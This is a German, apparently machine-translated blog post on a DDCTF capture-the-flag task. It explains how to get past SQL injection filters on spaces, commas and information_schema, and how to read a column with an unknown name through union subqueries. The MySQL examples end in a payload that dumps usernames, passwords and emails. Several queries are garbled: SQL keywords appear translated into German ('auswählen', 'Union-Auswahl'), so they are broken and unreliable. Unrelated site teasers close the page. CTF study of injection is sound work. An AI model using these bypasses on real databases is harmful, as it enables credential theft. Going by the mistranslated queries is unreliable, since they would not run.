Vorwort Dieser Artikel stellt die fünfte Frage von DDCTF vor, die Technik zum Umgehen unbekannter Feldnamen. Hier verwende ich die lokale Maschine, um sie zu betreiben. Die Idee ist großartig und klar. Teilen Sie sie mit allen. Schauen wir uns die ausführliche Einführung an: Umsetzungsideen Die Frage filtert Leerzeichen und Kommas. Leerzeichen können mit %0a, %0b, %0c, %0d, %a0 oder Klammern direkt umgangen werden. Kommas können mit „join“ umgangen werden. Der Feldname, in dem das Flag gespeichert ist, ist unbekannt und information_schema.columns filtert auch den Hex-Wert des Tabellennamens heraus, d. h. der Feldname kann nicht abgerufen werden. In diesem Fall kann eine gemeinsame Abfrage verwendet werden. Der Vorgang ist wie folgt: Die Idee besteht darin, die Flagge zu erhalten und sie unter einem bekannten Feldnamen erscheinen zu lassen. Beispielcode: mysql> auswählen (1 auswählen)a,(2 auswählen)b,(3 auswählen)c,(4 auswählen)d; +---+---+---+---+ | ein | b | c | d | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ 1 Zeile im Satz (0,00 Sek.) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ 1 Zeile im Satz (0,00 Sek.) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user; +---+----------+----------+-------------+ | 1 | 2 | 3 | 4 | +---+----------+----------+-------------+ | 1 | 2 | 3 | 4 | | 1 | Administrator | admin888 | [email protected] | | 2 | Test | test123 | [email protected] | | 3 | cs | cs123 | [email protected] | +---+----------+----------+-------------+ 4 Zeilen im Satz (0,01 Sek.) mysql> wähle e.4 aus (wähle * aus (wähle 1)a,(wähle 2)b,(wähle 3)c,(wähle 4)d Union wähle * aus Benutzer)e; +-------------+ | 4 | +-------------+ | 4 | | [email protected] | | [email protected] | | [email protected] | +-------------+ 4 Reihen im Satz (0,03 Sek.) mysql> wähle e.4 aus (Auswahl * aus (Auswahl 1)a,(Auswahl 2)b,(Auswahl 3)c,(Auswahl 4)d Union-Auswahl * aus Benutzer)e Limit 1 Offset 3; +-------------+ | 4 | +-------------+ | [email protected] | +-------------+ 1 Zeile im Satz (0,01 Sek.) mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d Union-Auswahl * vom Benutzer)e Limit 1 Offset 3)f, (Auswahl 1)g, (Auswahl 1)h, (Auswahl 1)i; +-------------+----------+----------+-------------+ | ID | Benutzername | Passwort | E-Mail | +-------------+----------+----------+-------------+ | 1 | Administrator | admin888 | [email protected] | | [email protected] | 1 | 1 | 1 | +-------------+----------+----------+-------------+ 2 Reihen im Satz (0,04 Sek.) Zusammenfassen Das Obige ist der vollständige Inhalt dieses Artikels. Ich hoffe, dass der Inhalt dieses Artikels Ihnen bei Ihrem Studium oder Ihrer Arbeit helfen kann. Wenn Sie Fragen haben, können Sie eine Nachricht hinterlassen. Vielen Dank für Ihre Unterstützung von 123WORDPRESS.COM. Das könnte Sie auch interessieren:
|
<<: Tomcat erhält den Clientdomänennamen des Nginx-Reverse-Proxys
In diesem Tutorial erfahren Sie alles über die In...
Installationsskript Ubuntu / CentOS Es scheint ei...
RPM-Paketverwaltung Ein Verpackungs- und Installa...
Verwenden Sie die Vue-Cropper-Komponente, um Avat...
Nginx verbirgt die Versionsnummer In einer Produk...
Floating Ads sind eine sehr verbreitete Form der ...
Nach Funktion sortierenNN: Gibt an, welche frühere...
1. Laden Sie die erforderliche Kernel-Version her...
Das CentOS-Projekt, ein 100 % kompatibler Neuaufb...
1. Den aktuellen Hostnamen anzeigen [root@fangjia...
<br />Formulare sind für Benutzer ein wichti...
Vorwort Die Standarddatenbankdatei der MySQL-Date...
In diesem Artikel wird der spezifische Code von v...
Inhaltsverzeichnis 1. Betreiber Zusammenfassen 1....
Vorwort Teilen Sie zwei Methoden, um zu überwache...